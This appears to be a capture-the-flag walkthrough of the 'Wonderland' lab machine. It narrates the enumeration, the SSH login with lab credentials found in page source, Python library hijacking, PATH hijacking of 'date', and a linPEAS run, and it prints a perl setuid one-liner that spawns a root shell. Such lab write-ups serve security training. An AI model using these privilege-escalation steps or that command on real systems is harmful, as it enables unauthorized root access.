Here is the initial nmap scan:
Looks like there is a webpage and an SSH server. Here is a look at the webpage:
After that I did a directory search with gobuster:
At the /r directory we get a message to “keep going”, so I ran another search:
Ok, so from here we have /r/a
I’m going to make the assumption that there is going to be something at /r/a/b/b/i/t/.
Also, remember there was a poem directory too:
And also /img
Back at the nmap results, I see that they are using Golang, so I started looking up possible vulnerabilities:
I did find a couple, including a potential DOS attack, but nothing that could really help me here.
A funny side note though, while I was searching around in Metasploit I got the rabbit graphic:
I went back to the things I already had.
Eventually, by looking at the source code on the /r/a/b/b/i/t page, I discovered there was an important reason for following the rabbit. It led us to what looks like Alice’s credentials:
Username: alice
Password: HowDoTheLittleCrocodileImproveHisShiningTail
I assume this can be used to login to SSH:
We’re in!
Looks like an interesting program down near the bottom. Also, weirdly, root.txt is located here instead of in the proper place. We don’t have permission to read it.
But I guess since it is Wonderland, “Everything is upside down here”. Maybe the user.txt is in the root directory.
From here we need to escalate our privileges to see the contents of root.txt.
After checking Alice’s permissions, I see that she can do some things with that walrus program as the user rabbit.
walrus_and_the_carpenter.py is a program that contains a very long poem. We do not have permission to edit it.
At the beginning, you will notice it imports something named random.
The script itself is not really doing that much, it seems to just print out 10 random lines from the poem.
But the whole thing can be used to our advantage with something called python library hijacking. If we create a file called random.py in our home folder, the walrus program will grab that one instead of the one it was meant to.
It doesn’t need to be overly complicated at all, just something that spawns us a shell as rabbit.
Create the file in Alice’s home directory. You can edit it with nano or something similar.
Remember to save it!
Great, our random.py file is in the right place:
Now let’s run the walrus program again (as rabbit this time) and see what happens:
Excellent. If we switch over to rabbit’s home directory there is a binary called teaParty.
If you run that, it will give you instructions about waiting for the Mad Hatter to arrive.
I can’t seem to use the string command here to check out the contents of the file, but I did use the cat command and picked through it a bit (luckily it was a small file).
I did find this:
So what it looks like is happening is that the program is using ‘date’ to generate a time that the hatter will show up.
But it is using date without specifying any absolute path. There is a way to exploit this by exporting your own path so that teaParty will look there for date first.
The next step is to create a fake date file in the /tmp directory, one that includes a small script that will create a shell. The next time teaParty runs it will find this and execute it instead of the real one.
Again, remember to save!
From here, make the new file executable:
Now run teaParty again and see what happens…
It looks like we are now hatter.
If you make your way to hatter’s home directory, you can see there is a file called password.txt:
Let’s try connecting via SSH as our new user, so we can get the full hatter experience.
After messing around a bit and not finding much, I used linPEAS to automate my search. If you’re not familiar with how to use linPEAS, the documentation can be found HERE (raw script HERE).
I also have a blog post that goes over it HERE. Basically, after you save the raw script to your computer, you’re using a simple server on your end to grab it from the hatter’s end and then execute it.
Under the capabilities section of the report, we can see that perl has the capability to set UID. This means that hatter can set their own UID to 0, which is root.
You can leverage this using the following command to spawn a shell as root:
perl -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’
Happy Hacking! ❤
